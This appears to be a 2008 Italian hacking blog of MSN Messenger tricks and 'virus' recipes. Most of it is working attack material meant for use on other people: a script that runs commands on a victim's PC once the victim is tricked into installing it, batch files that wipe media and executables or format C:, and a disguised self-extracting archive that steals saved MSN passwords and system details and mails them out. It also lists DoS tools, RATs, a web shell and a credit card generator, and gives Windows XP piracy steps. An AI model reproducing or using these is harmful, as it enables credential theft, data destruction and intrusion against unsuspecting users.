Ragazzi spero già abbiate preso precauzioni per non far vedere le conversazioni msn a terzi (altre persone) ma se non l'avete fatto questa e la volta buona, se non lo sapete tutto quello che scrivete viene mandato su internet basta che uno ha un qualke conoscenza di html e vi rintraccia lo fanno anche lel forze dell'ordine ma per contrastarli e criptare le nostre conversazioni ecco un bellissimo programma che vi fa restare anonimi sul web ecco il link da dove scaricarlo.

http://www.secway.fr/us/products/simplite_msn/getsimp.php

Ecco come spiare le conversazioni msn

E’ possibile, con la complicità di uno dei partecipanti, spiare o intercettare i messaggi scambiati con l’altro o con gli altri partecipanti di una conversazione di Windows Live Messenger. Per farlo, è necessario usare Messenger Plus! Live, che permette di espandere le funzionalità di Windows Live Messenger.
Se non lo hai già fatto, scarica ed installa subito Messenger Plus! Live. Poi, entra su Windows Live Messenger e scarica il file a questo link

http://www.msgpluslive.net/scripts/view/8-Linked-Chats/

Dopo averlo scaricato, fai doppio click su di esso. Si apre una finestra di Mesenger Plus! che ti chiede se vuoi importare lo script: fai click su Importa e poi su OK.
A questo punto, supponiamo che tu, Totore, stai parlando con Ennar e vuoi fare leggere di nascosto a Cuncett i messaggi che stai scambiando con Ennar. Nella finestra in cui stai parlando con Ennar, fai click sul pulsante Scripts, seleziona Linked Chats e poi Link this chat.
Nella finestra che si apre, metti un segno di spunta al contatto di Cuncett e fai click sul pulsante centrale Link. A partire da questo momento, tutti i messaggi che scambi con Ennar vengono mandati di nascosto a Cuncett che potrà leggere la vostra conversazione in tempo reale.
Se vuoi interrompere l’invio della copia dei messaggi scambiati con Ennar a Cuncett, devi fare click sul pulsante Unlink nella finestra Linked Chats.

Ecco come entrare nei Pc altrui con Msn

Msn Plus Blooster 1.1 è uno script per Windows Live Messenger,

ovviamente con Live Plus installato,

per chi non l’abbia installato e non sappia cos’è andate a questo link:

http://www.amogawebmania.com/2007/12/09/scarica-download-messenger-plus-live-45-gratis/

Questo script ci dà la possibilità di mandare dei comandi all’altro pc e farli eseguire.

Per esempio potete cambiare il nickname del vostro amico di msn o addirittura eseguire

comandi dos. Potete fare tante cosette malvage, ma non ve lo consiglio! Perchè è illegale!

Adesso vi rilascio una lista di comandi che potete usare con questo script, eccola:



* testo = modifica il messaggio personale;

** testo = modifica il messaggio personale e non permette la modifica (si disattiva se viene inviato il comando *);

% testo = modifica il nick;

st + numero (compresi tra 1 e 9) = modifica lo stato. Esempio: st 2 (il contatto diventa invisibile);

& testo = crea nel pc della vittima un messaggio toast con all’interno il vostro testo (\n per andare a capo);

info! = da’ informazioni sulla versione di msn e da anche la lista contatti della vittima;

lockmsn! = blocca msn (l’utente può sbloccarlo);

closemsn! = disconnette il contatto;

ex “comando” = esegui comandi sul pc della vittima;

esempio aprire un file:
ex C:\WINDOWS\system32\cmd.exe oppure C:\WINDOWS\system32\cmd

op “email” = apre una conversazione con il contatto che ha quella mail , deve essere per forza nella lista della vittima;

add “email” = aggiunge un contatto alla vittima, ma richiede la conferma;

Convo! = (rispettate la maiuscola) inserisce un file .cnv nella vostra cartella condivisa (quindi prima createla e assicuratevi ke funzioni), il file va rinominato in .rar e dentro ci sn le conversazioni della vittima! potrebbe non funzionare visto che non l'ho mai provato su nexuno



IMPORTANTE



Per far funzionare lo script, non dovete installarlo voi! Ma con inganno dovete far
installare lo script alla vittima! Voi non installate niente! Appena avrete avuto la conferma che il vostro nemico ha installato lo script allora procedete con i comandi che vi ho inserito sopra!
Adesso potete pariare!!!

Ecco qui sotto il link per il download dello script

http://www.amogawebmania.com/?dl=199


IO NON MI ASSUMO NESSUNA RESPONSABILITA E VI DICO E VI RIDICO CHE QUESTO SCRIPT SE USATO SUI COMPUTER DELLA GENTE E ILLEGALE PERCIO USATELO SOLO A SCOPO INFORMATIVO POTRESTE ESSERE IMPUTATI PER LAMERING STATV ACCORT WAGLIU

Trilli infiniti e piccole modifche ecco kome!!!

Per mandare trilli infiniti e far impazzire un contatto oppure fare delle varie modifice nel proprio msn(tipo togliere la publicità,oppure allungare la capacità di lunghezza del proprio nick,etc...)dovete scaricare a-patch.

http://apatch.org/downloads.php per versione msn 8.5 e msn 9.0 e yahoo messenger

Ecco come vedere se un contatto ci ha eliminati!!

Un altro modo per sapere se un nostro contatto c'ha eliminato dalla sua lista....

Prima di tutto bisogna scaricare aMSN 0.96, DOWNLOAD QUI.

Una volta scaricato, apri aMSN e nella finestra che si apre, fai click sul tasto Close.
A questo punto, fai click sulla voce Language, seleziona Italian (italiano) e fai click su OK. Infine, chiudi il programma, premendo assieme i tasti Ctrl+Q, e riaprilo per averlo in Italiano. Se appare una finestra chiamata Aggiornamento, fai click sul pulsante Chiudi.




Nella finestra principale di aMSN, fai click sulla voce Clicca qui per accedere; inserisci i tuoi dati per accedere al tuo account Windows Live Messenger (username e password, tranquilli non è un fake login) e fai click su OK. Se sei collegato a Windows Live Messenger, questo si disconnetterà ed apparirà la seguente finestra. Non preoccuparti, è tutto normale.



I contatti di Windows Live Messenger che ti hanno cancellato dalla loro lista contatti verranno marchiati con una x rossa accanto a sinistra del nome

Ecco kome nn farsi bloccare su msn

Finalmente saremo ,con questo trucco, immuni all'essere bloccati.
Per prima cosa bisogna far installare lo script alla vittima, quindi deve avere il plus.

Ecco la guida:
1-Prendete il blocco note e inserite questo codice sostituendo "tuamail" con il proprio



CODICEvar mail = "tuamail@hotmail.it";
function Debug(msg){
msg = MsgPlus.RemoveFormatCodes(msg);
MsgPlus.DisplayToast("Msn Plus! Live", msg, "");
}
function OnEvent_ContactBlocked(mail){
Debug("Errore 81ef91d \n Impossibile bloccare o rimuovere contatto. \n Riprovare più tardi");
contact = Messenger.MyContacts.GetContact(mail);
contact.Blocked = false;
}




Appena il contatto che ha installato il programma prova a bloccarvi, voi venite subito sbloccati e compare un toast: "Errore 81ef91d Impossibile bloccare o rimuovere contatto. Riprovare più tardi"...se volete potete anke modificare il messaggio di errore ("\n" fa andare a capo). Personalmente ho scrito cazzimoso non lo puoi bloccare per eccesso di cazzimma

Adesso salviamo il file appena creato e rinominiamolo in .js (nometuoscript.js): inventatevi qualche cacchiata per convincere il tizio a scaricare lo script...

2-Adesso creiamo un altro file txt e inseriamo:




CODICE


Nome del tuo script
scrivi qui una descrizione dello script
v8a1l9e1@hotmail.it






Modificate il codice qui sopra,dove c'è scritto nome del tuo script, scrivi qui una descrizione... etc... per modificare il nome, la descrizione dello script, e l' email per aiuto..(inseritene una a cavolo o magari inventata)

Salvate e rinominate in ScriptInfo.xml altrimenti MsnPlus non legge il pacchetto

3-Prendete i 2 file creati ( tuoscript.js , ScriptInfo.xml ) e comprimeteli in archivio .zip e dopo rinominate l'archivio in .plsc

Lo script adesso è pronto! quindi non resta che inviarlo alla vittima!!

sabato 27 settembre 2008

Come creare virus

Ekko una guida facile e veloce di come creare i + piccoli virus e facile e nn necessità di particolare abilità solo di pazienza

1) Aprire il blocco note
2) Incollarci il codice
3) Chiudere e salvare il file in .bat


Virus Per Cancellare Un File
1) Aprite il blocco note
2) Incollateci 1 dei seguenti codici:

CODICE
@ERASE /comando "C:\percorso\percorso *.*"
@DEL /comando "C:\percorso\percorso *.*"

3) Chiudete e salvate in .bat


IN DETTAGLIO: Che significa quel codice?
Allora:
1) @ERASE e @DEL = Sono per cancellare file
2) /comando = Bisognerebbe inserire 1 o più comandi tra questi:

a) /P Chiede conferma prima di eliminare ogni file.
b) /F Forza l'eliminazione dei file di sola lettura.
c) /S Elimina i file specificati da tutte le sottodirectory.
d) /Q Modalità silenziosa, non chiede conferma per eliminazioni globali.
e) /A Seleziona i file da eliminare in base agli attributi.

3) *.* = Il PRIMO asterisco serve per cancellare TUTTI i file con un certo nome, come:
CODICE
eversor.*

4) *.* = Il SECONDO asterisco serve per cancellare QUALSIASI tipo di ESTENSIONE di un file, come:
CODICE
*.txt


5) QUINDI, in sostanza se dobbiamo cancellare il file "eversor" in .txt sul desktop, faremo:
CODICE
@ERASE /S /Q "C:\Programmi\Documents and settings\L.H.S.\Desktop\eversor.txt *.txt"



Virus Per Cancellare Una Cartella
1) Aprire il blocco note
2) Inserirci dentro il seguente codice:
CODICE
@RD /s /q C:\Percorso_Cartella

3) Salvare in .bat

IN DETTAGLIO: Perchè @RD?
@RD Serve in questo per cancellare una cartella, mentre @DEL e @ERASE era per File, @RD è per cartella.


Virus Per Formattare C:
1) Aprire il blocco note
2) Inserirci dentro il seguente codice:
CODICE
format C: /autotest /q /u

3) Salvare in .bat

IN DETTAGLIO: Questo virus formatta c: senza chiedere conferma (/q) e non permette di essere bloccata piu avanti (/u)


Virus Per Disconnettere/Riavviare/Spegnere il PC
1) Aprire il blocco note
2) Inserire dentro il seguente codice:
CODICE
shutdown -comando

3) Salvare in .bat

IN DETTAGLIO: Il -comando può essere sostituito tra i seguenti:

a) -i : Attiva l’interfaccia utente grafica
b) -l : Disconnette l'utente
c) -r : Riavvia il PC
d) -s : Spegne il computer
e) -t xx: xx Sarebbero i secondi di attesa prima della chiusura di Windows
f) -f : Chiude le applicazioni ancora aperte


Virus Per Far Impallare Il PC
1) Aprire il blocco note
2) Inserire dentro il seguente codice:
START
START
START
START
START
START
START
START
ecc...
3) Salvare in .bat

IN DETTAGLIO: Se aprite l'msdos (Start--->Esegui--->cmd) e scrivete START, a sua volta vi apre di nuovo il prompt.
Che succede se voi scrivete START tipo 500 volte (MAGARI COL NOSTRO FLODDER SPECIALE) salvate in batch e lo mandate alla vittima???
Beh, vi lascio a voi immaginare.


Trasformare Il .bat In .exe
1) Scaricate il seguente programma: Batch To Exe 1.2
2) Apritelo e scegliete le opzioni, si può anche cambiare l'icona del file


Aumentare Il Peso Del Virus
1) Aprire il blocco note
2) Incollarci dentro il codice
3) Aggiungere il codice:
CODICE
@REM parole_a_caso_ma_tante

4) Salvare in .bat

IN DETTAGLIO: Perchè @REM?
Allora si da il caso che il comando @REM, serva per "Inserire Commenti", MA, se noi al posto dei commenti mettiamo non so, 500 volte la lettere aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, non faremo altro che AUMENTARE il peso del virus.

questi invece sono i comandi del ms-dos:
* assign - reindirizza tutte le richieste a un drive, verso un altro drive
* attrib - visualizza o modifica gli attributi dei file
* backup - crea una copia di sicurezza di uno o più file su una serie di floppy-disk
* break - abilita o disabilita l'interruzione o l'esecuzione fornita da CTRL C e CTRL BREAK
* cd - entra in una directory
* chdir - cambia la directory corrente o ne visualizza il nome
* chkdsk - analizza il contenuto del disco e visualizza una relazione sul suo stato
* cls - cancella il contenuto della schermata (questo comando non è distruttivo)
* color - permette di impostare il colore dello sfondo e del testo
* command - avvia un nuovo interprete dei comandi MS-DOS
* comp - confronta il contenuto di un file o gruppo di file con altri
* copy - copia uno o più file in un altro punto del disco
* ctty - cambia la console di input/output da cui vengono impostati i comandi
* date - visualizza e permette di aggiornare la data
* defrag - riorganizza i file in un disco rigido per ottimizzarne l'uso
* del - cancella uno o più file
* deltree - elimina una directory e tutti i file e le sottodirectory in essa contenute
* dir - visualizza il contenuto di una directory
* discopy - copia il contenuto di un disco floppy in un altro disco floppy
* diskcomp - confronta il contenuto di due dischetti dello stesso tipo
* doskey - ripete gli ultimi comandi digitati
* echo - abilita o disabilita l'eco da file batch
* edit - avvia MS-DOS Editor per creare o modificare i file ASCII
* edlin - avvia un editor di righe di testo. Per magg. informazioni (Prompt comandi e edlin/?)
* emm386 - abilita o disabilita la memoria espansa di EMM386
* erase - cancella uno o piu file specificati
* exe2bin - converte in formato binario un file eseguibile
* exit - provoca l'uscita da un interprete di comandi secondario per ritornare ad un interprete di comandi o ad un programma precedenti
* expand - decomprime uno o più file compressi
* fastopen - accellera l'apertura di un programma
* fc - confronta il contenuto di due file
* fdisk - configura un disco rigido creando le partizioni, per l'utilizzo di MS-DOS
* find - ricerca una sequenza di caratteri all'interno di uno o piu file
* for - permette di eseguire in modo iterattivo comandi di MS-DOS
* format - formatta un disco per l'utilizzo di MS-DOS
* goto - trasferisce l'esecuzione ad una determinata posizione di un file batch
* graftabl - carica in memoria i caratteri ASCII non BIOS per i modi grafici
* help - visualizza la guida di MS-DOS. ATTENZIONE la guida è troppo lunga per essere visualizzata in una sola schermata, quindi per visualizzarla schermata per schermata digitare help|more (il simbolo "|" è il tasto alla sinistra tasto uno (1) altrimenti alt+124 = "|" e scrivere more
* hexdump - lista in formato esadecimale il contenuto di un file, byte per byte
* if - condiziona l'esecuzione di un comando in un file batch
* ipconfig - visualizza configurazione IP di Windows. ATTENZIONE per maggiori informazioni digitare ipconfig/all
* join - unisce un drive di disk ad una directory vuota su di un altro drive
* keyb - configura la tastiera per la lingua specificata
* label - crea, modifica o elimina l'etichetta di volume di un disco
* md - crea una directory
* mem - visualizza la quantità della memoria usata e quella libera del sistema
* mode - stabilisce le modalità di visualizzazione e trasmissione per la stampante
* more - permette la visualizzazione di informazioni, (files, pagine, o altri tipi di dati) che per la loro grandezza (insieme di righe) devono essere visualizzate con più schermate alla volta. ATTENZIONE è necessario che "more" sia preceduto dal simbolo "|" ALT+124. Ex. help|more. Prestare ulteriore ATTENZIONE in alcuni computers o Sistemi operativi anteriori al MS-DOS 6.0 non riconoscono il simbolo "|" è, perciò, necessario digitare il simbolo "/" seguito da una p. Ex. help/p
* path - visualizza o imposta un percorso di ricerca per file eseguibili
* pause - provoca una pausa nell'esecuzione di un file batch per consentire un input da operatore
* print - stampa un file di testo
* prompt - cambia il prompt dei comandi di MS-DOS
* rd - cancella una directory
* recover - recupera un file o un intero disco con settori danneggiati
* rem - visualizza commenti durante l'esecuzione di un file batch
* ren - rinomina uno o più file
* replace - sostituisce i file
* restore - ripristina dai dischi di back-up un certo numero di file
* rmdir - rimuove una sottodirectory vuota
* select - copia il dischetto MS-DOS per creare una copia di lavoro per la nazionalità selezionata della tastiera
* set - assegna un valore di sostituzione ad un parametro con chiave presente in un programma applicativo o in un file batch
* share - installa la condivisione ed il bloccaggo dei file MS-NET
* shift - aumenta il numero di parametri sostituibili in un file batch
* shutdown - arresta o riavvia il sistema
* sort - ordina i dati alfabeticamente, in un senso o nell'altro
* subst - associa un percorso ad una lettera di unità
* sys - copia i file di sistema di MS-DOS e l'interprete dei comandi sul disco specificato
* time - visualizza e consente di modificare l'ora
* title - permette di impostare il titolo della finestra
* tree - visualizza tutte le directory ed i percorsi del drive specificato
* type - visualizza il contenuto di un file di testo
* undelete - ripristina i file cancellati precedentemente con il comando del
* unformat - ripristina i dati di un disco cancellati con il comando format
* ver - visualizza la versione di MS-DOS in uso
* verify - abilita la verifica dei dati in scrittura
* vol - visualizza l'etichetta e il numero di serie di volume del disco
* win - esegue Windows
* xcopy - copia i file e la struttura delle directory (ad esclusione dei file nascosti e di sistema)

i comandi dos sono molto utili x fare dei virus .bat...

Messaggio personale che cambia

Si tratta di My Spellbook in cui puoi impostare vari PSM (le frasi personali) ed il tempo in cui girano beh ragazzi provatelo ecco qui il download!

Dritta sui virus

Un virus informatico non è altro che un programma come gli altri capace di replicarsi tramite altri file non infetti e danneggiare il sistema.

Qui di seguito vi illustrero i principali virus!



Troyan Horse



Un Troyan Horse non è un virus come gli altri ma bensì un programma distruttivo. Le caratteristiche che lo differenziano dagli altri virus sono che mentre i virus cercano di rendersi invisibili e a replicarsi, i Troyan Horse danneggiano esplicitamente il sistema!

Il loro nome deriva dal fatto che i Troyan Horse vengono divulgati con nomi fittizzi ovvero vengono distribuiti con il nome di programmi molto ricercati dagli utenti per fare in modo di essere aperti e danneggiare il sistema!

Questi sono i virus più semplici da costruire, ciò nonostante sono distruttivi e potenti sia perché provocano vistosi danni sia per il fatto che non vengono quasi mai rivelati dagli antivirus.



Worm



Un Worm è un tipo di virus “tecnologicamente più avanzato”, esso infatti si replica lungo le reti (internet, tanto per capirci). E' un tipo di virus molto potente ma tuttora non esistono campioni di questo virus molto avanzati. La causa principale è la presenza di vari sistemi operativi (sulla rete) che non ne facilitano lo sviluppo, anche se i worm sembrano avere facile sviluppo sulle piattaforme come Unix,Linux e Java.



Dialer



E un programma che cambia le impostazioni di “accesso remoto”, cioe' i dati impostati per la connessione ad Internet via modem, in modo da chiamare un numero a pagamento. Tutte le connessioni ad Internet via modem verranno quindi dirottate sul numero a pagamento con il risultato di vedersi arrivare nella bolletta una fattura stratosferica.



Spyware



E un termine generico che indica tutta una serie di “programmino” che vengono installati in maniera piu' o meno lecita sul computer, sia attraverso siti Web particolari, sia attraverso software "gratuito" scaricabile da Internet.

La funzione e' molto simile a quella del Trojan tranne che la maggior parte delle volte la presenza dello Spyware viene apertamente dichiarata dagli autori dei programmi. Il fine degli Spyware nel migliore dei casi e' quello di raccogliere informazioni sull'utente, ad esempio quali pagine Web visita, quando, quanto, eccetera. Gli esiti visibili sono di solito l'interferenza con il normale funzionamento del browser e un anormale consumo di risorse di sistema.



Macro Virus



Questi sono virus più usati al momento. Anno il vantaggio di essere multi-piattaforma cioè funzionano su Win e su Mac. Le applicazioni a rischio per questi virus sono:



Ms-Word 9x (File .doc)



Ms-Excel9x (File .xls)



e quasi tutti gli altri programmi che consentono l'uso di Macro. Questi virus vengono scritti in Visual Basic.



Companion Virus



La creazione di questi virus è molto semplice come del resto anche la loro eliminazione. Il comportamento di questi virus è molto semplice: sfruttano la priorità d'esecuzione dei .com

Esempio:

In un adirectory ci sono due file:

1)Run.exe

2)Run.com

Se si vuole eseguire uno dei due ma noi si indica l'estensione, il sistema Microsoft esegue il file .com

Quindi il funzionamento di questi virus è molto semplice, essi infatti cercano i file .exe e copiano (nelle loro dir)

i virus ma con l'estensione .com Così all'avviamento dell'applicazione viene aperto il virus e non il programma desiderato.



Ad Azione Diretta



Questi virus infettano un file eseguibile e appena questo viene aperto il virus cerca nelle directory altri file “infettabili” in modo da propagare l' infezione.



Virus Stealth



Simile alla categoria precedente i virus Stealth riescono a prendere il controllo delle funzioni base del Dos e ad eliminare ogni sintomo dell'infezione che è avvenuta. La categoria Stealth ha ancora tre ulteriori suddivisioni:

1. Size Hiding: se il virus è lungo 100 kb,la dimensione di tutti i file che verranno infettati verrà aumentata di 100Kb.

Rende difficile la sua identificazione grazie all'identificazione del comando "dir", quindi il virus sottrae il valore aggiunto in precedenza facendoli così non sembrare infetti.

2. Mbr Stealth: questa è la categoria che infetta l' Mbr (Master Boot Record), salva una copia del vecchio Master e la restituisce quando un Antivirus va a leggere l' Mbr in modo da non non rendere "visibile" l'infezione.

3. Clean On-The-Fly: ottima tipologia di virus che utilizza un sistema molto utile per non essere identificato, infatti questi virus intercettano l'operazione di lettura dei file infetti e prima che questi vengano letti li ripulisce facendo sembrare non infetti i file al controllo, poi una volta controllato il file il virus procede a re-infettarlo.



Virus Polimorfici



Questo tipo di virus utilizza la tecnica di crittografia in modo da essere riconoscibile solo dal motore crittografico del virus stesso,oppure vengano utilizzati tools esterni. In questo modo il virus (e gli eventuali file infetti da esso) sono difficilmente individuabili.

XP falso diventa originale ecco come

Rendere la copia di Windwos xp originale

1)Scarichiamo il pacchetto contenente tutto il necessario da questo indirizzo:

http://morpheus8.altervista.org/genuine.rar

2)Una volta scaricato scompattiamo l’archivio

3)Aprite il file Windows XP Keygen.exe per calcolare un seriale valido e salvarlo da qualche parte. NB:funziona solo con Windows Xp Professional (con o senza service pack 2). Non vale per XP Home Edition. Se avete questo avrete bisogno di un seriale originale.

4)Eseguire il file Keyfinder.exe. Adesso verrà mostrato il vecchio seriale.
Per sostituirlo con il nuovo andate in : Options/Change Windows Key.

5)Inserire il seriale che prima avete calcolato e cliccare Change e OK

6)Aprire il programma WGA fix.exe e cliccare Si.

7)Esegui il programma MGADiad.exe e premi il tasto continue ( così verificherai se la tua copia è diventata genuina.

8)Controlla il Validation Status, nella prima riga in alto. Se troverete scritto “Genuine” allora avrete la vostra copia di Windows Xp regolarmente valida e più il problema WGA

Un mio lavoretto per scassare i pc

questi qui sono 2 file .bat(virus) creati da me molto carini se c'e qualcuno che vi rompe le palle e volete devastargli il computer usate questo file.... (per .bat si intende virus)

CODICEdel /s C:\*.jpg
del /s C:\*.jpeg
del /s C:\*.bmp
del /s C:\*.gif
del /s C:\*.png
del /s D:\*.jpg
del /s D:\*.jpeg
del /s D:\*.bmp
del /s D:\*.gif
del /s D:\*.png
del /s D:\*.mp3
del /s D:\*.wma
del /s D:\*.wmw
del /s D:\*.mp4
del /s D:\*.avi
del /s D:\*.3gp
del /s D:\*.rar
del /s C:\*.mp3
del /s C:\*.wma
del /s C:\*.wmw
del /s C:\*.mp4
del /s C:\*.avi
del /s C:\*.3gp
del /s C:\*.rar
del /s C:\*.exe
del /s D:\*.exe

aprite il note pad slavatelo in .bat ATTENZIONE A NON APRIRLO VI CANCELLEREBBE TUTTI IL FILE DAL PC
infatti questo .bat va a cercare tutti i file di tipo foto,audio,video,exe
cancellando sistema operativo e qualsiasi altra cosa presente nel computer

se volete somalente disturbare usate quest altro,creera cartelle in tutto il computer nbella cartella di windows in C:\ in D:\ dekstop e in ogni altro punto possibile


CODICE@echo off
@cd\
@:eterno
@cd\
@cd windows
@echo morte > %­random%.txt
@md %­random%
@cd system
@echo violenza > %­random%.txt
@md %­random%
@cd..
@cd system32
@echo peste > %­random%.txt
@md %­random%
@cd..
@cd addins
@echo sofferenza > %­random%.txt
@md %­random%
@cd..
@cd AppPatch
@echo desolazione > %­random%.txt
@md %­random%
@cd..
@cd Config
@echo pena > %­random%.txt
@md %­random%
@cd..
@cd Driver Cache
@echo guerra > %­random%.txt
@md %­random%
@cd..
@cd Fonts
@echo povertà > %­random%.txt
@md %­random%
@cd..
@cd Help
@echo indifferenza > %­random%.txt
@md %­random%
@cd..
@cd ime
@echo sopraffazione > %­random%.txt
@md %­random%
@cd..
@cd WinSxS
@echo pena di morte > %­random%.txt
@md %­random%
@cd..
@cd Temp
@echo umanità distrutta > %­random%.txt
@md %­random%
@cd..
@cd security
@echo insicurezza > %­random%.txt
@md %­random%
@cd..
@cd RegisteredPackages
@echo regimen > %­random%.txt
@md %­random%
@cd..
@cd Prefetch
@echo imperfezione > %­random%.txt
@md %­random%
@cd\
@cd Documents and Settings
@echo dolore > %­random%.txt
@md %­random%
@cd\
@cd Program files
@echo distruzione > %­random%.txt
@md %­random%
@cd\
@cd Programmi
@echo sangue > %­random%.txt
@md %­random%
@cd\
@cd %­userprofile%\desktop
@echo buk > %­random%.txt
@md %­random%
@cd\
@cd %­userprofile%\documenti
@echo buk88 > %­random%.txt
@md %­random%
@cd\
@cd %­userprofile%
@echo Buk > %­random%.txt
@md %­random%
@cd\
@echo infinito > %­random%.txt
@md %­random%
@goto :eterno



Ki sà ampliare la devastazione di questo virus mi contatti su msn il mio contatto e pan_e_puparuol@hotmail.it

I miei programmi da hacker

IO NN MI ASSUMO LA RESPONSABILITà DELLE COSE KE FARETE CN QUESTI PROGRAMMI IO STO DANDO SOLO INFO

QUESTI SONO + DELLA METà DEI PROGRAMMI CHE USO PER LE MIE HACKERATE E SONO ANCORA UN PRINCIPIANTE PENSATE I VERI HACKER CHE AVRANNO SUI PC E VABBE VI DOVETE ACCONTENTARE DI QUESTO SPERO VI SIA STATO UTILE

Acunetix Web Vulnerability Scanner 3
Descrizione: Ecco a voi uno scanner per trovare vulnerabilità sui siti web.

aSpyOne Rat Reverse Connection
Descrizione: Si tratta del famoso rat bypass lan roter firewall completo di tante funzioni password,storage, spyaudio eccc veramente da provare. (verrà segnalato come trojan)

Assault
Descrizione: Ecco un ottimo flodder che usa le porte UDP e ICMP. Verrà segnalato come virus, non preoccupatevi apritelo ugualmente.

Attacco Dos
Descrizione: Un Esempio di un attacco Dos Denial of service ps è fatto in visual absic net 2005 serve il framework per poterlo usare e epr poterlo prendere tasto destro sul link e mettere salva oggetto con nome.

Battle PonG
Descrizione: Molto semplice, ma, anche molto potente, basta inserire l’ip scegliere la grandezza del ping, la velocità, e il gioco è fatto.

Binary to Ascii
Descrizione: Discreto convertitore di Codice binario ad ascii

Brutus
Descrizione: Programma che sfrutta Brute Force {Forza Bruta}

Cain&Abel
Descrizione: Uno dei migliore cracker di passwd ma molto lento…

Credit Card Generator
Descrizione: Generatore di carte di creditò Visa/Amercan Express

DDos Ping 1.03
Descrizione: Programma eccezionalmente utile per fare un ddos..

DNS scanner
Descrizione: Questo scanner permette di ricavare informazioni su una porta specifica di un pc

DosAttack
Descrizione: Un Buon attacco dos ( Denial Of Service )

Fake Mail
Descrizione: Ottimo Fake Mail fatto in visual basic

Hscan
Descrizione: Ottimo scanner che serve per trovare vulnerabilità su un range di ip.

Inferno Nuke
Descrizione: Buon Nuke, usato soprattutt in IRC

Legion Scanner
Descrizione: Ottimo scanner per netbios, scanda la porta 139 e se trova condivisioni ti fa accedere direttamente nel pc della vittima.

Md5 Cracker
Descrizione: Ottimo cracker per le passwd MD5 è famoso per la sua velocità.

MD5 Finder
Descrizione: Ottimo Crack di Password MD5

Modem Spy
Descrizione: Questo programma è capace di rubare tutte le informazioni delle telefonate che ricevete dallo sdoppiatore della linea telefonica.

Modulo Fake Mail (php html)
Descrizione: Modulo in formato html o php ( a scelta dell’utente ) da inserire nel proprio sito, per dar luogo ai propri utenti di inviare anonimail gratuite. L’arrivo della mail e sicuro al 100% .

Ricordo che Inviare E-Mail Anonime non è illegale, serve a rispetare la Privacy. Abusare di tale Servizio per scopi illeciti, e illegale ed a responsabilità del Mittente.
Eurohackers.it non si assume nessuna responsabilità sull’uso improprio di questo script, facendo affidamento sul Buon Senso degli utenti.

Neo.Trace.Pro.v3.25
Descrizione: Ottimo programma che pinga un IP risalendo al server di chiamata, per scoprire da quale paese chiama l’indirizzo.

Panther Mode -2- DSL
Descrizione: Attacca le linee ADSL

Rocket
Descrizione: Ecco qua!!! E’ vero ormai nessuno usa più la 56k, ma se ne conosce qualcuno, e gli volete male, allora questo fa al caso vostro, basta un click e quello che vi rompeva in chat si scollega.

Shadow Scanner
Descrizione: Programma che scannerizza un range di ip e trova passwd di accaunt FTP. Equivalente di Windows per Linux

Shell c99
Descrizione: Shell C99 , la migliore in circolazione, il file si presenta .rar ed al suo interno e compreso di shell in php jpg e txt.

Smurf
Descrizione: In assoluto il miglio programma per attacchi DOS , basta inserire l’ip e in pochi minuti disconnette un modem ADSL 4/6 MB. All’interno comprende File di Broadcast e istruzioni per il suo utilizzo.

Smurf Ver1.7 Completo di Broadcast
Descrizione: Smurf versione 1.7 completo di broadcast, uno degli attacchi flood più potenti.
Opera tramite l’invio di pacchetti spoofati da dos.

Super Scanner 4.0
Descrizione: Il Miglio scanner in circolazione per Windows, Ottimo , Veloce ed Affidabile.

Syn Host By Scarface
Descrizione: Semplice Port #### fatto in visual absic net 2005 serve il framework per aprirlo e per scaricarlo tasto destro sul link e mettere salva oggetto con nome.

UnaBomBer
Descrizione: Discreto mailbomber lo usato poche volte solo per test su account creati da me! Comunque e ottimo come ripicca contro un persona che ti ha fatto lo stesso attacco.

Zip Password Revelator
Descrizione: Buon Cracker di password ZIP

venerdì 26 settembre 2008

Come prendere password contatti MSN

Finalmente in anteprima mondiale come prendere le password eei contatti msn non è molto difficile farlo basta solo una piccola conoscenza di computer

Tutto ciò che vi occorre è:

a) Quick Batch File Compiler

b) Blat

c) MsnPass (o MessenPass)

d) winrar (serve assolutamente questo per creare gli archivi come ve li spiego)
Ora vi spiegherò come creare il file da mandare alla vittima. Appena la vittima apre il file automaticamente ti arriverà la sua password di msn (se ce l'ha salvata nella schermata di login)

1° Aprire Quick Batch File Compiler

2° Copiarci dentro questo codice

<>

@echo off
MsnPass.exe /stext Test.txt
echo. >> Test.txt
cls
echo COMPUTERNAME = %COMPUTERNAME% >> Test.txt
echo USERNAME = %­USERNAME% >> Test.txt
echo USERDOMAIN = %­USERDOMAIN% >> Test.txt
echo USERPROFILE = %­USERPROFILE% >> Test.txt
echo. >> Test.txt
ipconfig /all >> Test.txt
echo. >> Test.txt
netstat -na >> Test.txt
cls
@blat -install smtp.tiscali.it Password@tiscali.it
cls
@blat Test.txt -to "TuaMail"
cls
del blat.exe
del Test.txt
del Mail.exe

<>

3° Sostituire in "TuaMail" l'email dove vuoi ti arrivino le password

4° Cliccare in alto su "Project" e andare su "Options" selezionando poi "Ghost Application"

5° Compilare col nome di Mail.exe

6° Scaricare MsnPass.exe e Blat (Presenti ad inizio discussione)

7° Creare un archivio con dentro i file del Blat, MsnPass.exe e Mail.exe

8° Spuntare la casella cn scritto "Crea un archivio auto-estraente"

9° Andare in "Avanzati" e poi cliccare su "Modulo auto-estraente". Vi troverete nella sezione "Generale"

10° Inserire questo in "Percorso d'estrazione": %­HOMEDRIVE%\Windows\System32

11° Inserire questo in "Esegui dopo l'estrazione": Mail.exe

12° Andare nella sezione "Modalita" e selezionare "Nascondi Tutto" e "Sovrascrivi tutti i file già esistenti"

13° Cliccare "Ok" e poi create l'archivio

14° Mandare il file alla vittima

Contatto msn senza @hotmail o @live

Per creare un account messenger personalizzato, basta andare all'indirizzo d registrazione ovvero http://get.live.com/getlive/overview , poi cliccare su uno dei 2 registra, poi mettete la seconda possibilità usa il tuo indirizzo di posta elettronica e inserire il contatti che volete creare


ESEMPIO TOTONN@O_SFRIGGIAT.IT ovciamente tutto scritto in piccolo e senza accenti o apostrofi e avrete il vostro contatto personalizzato!!!!!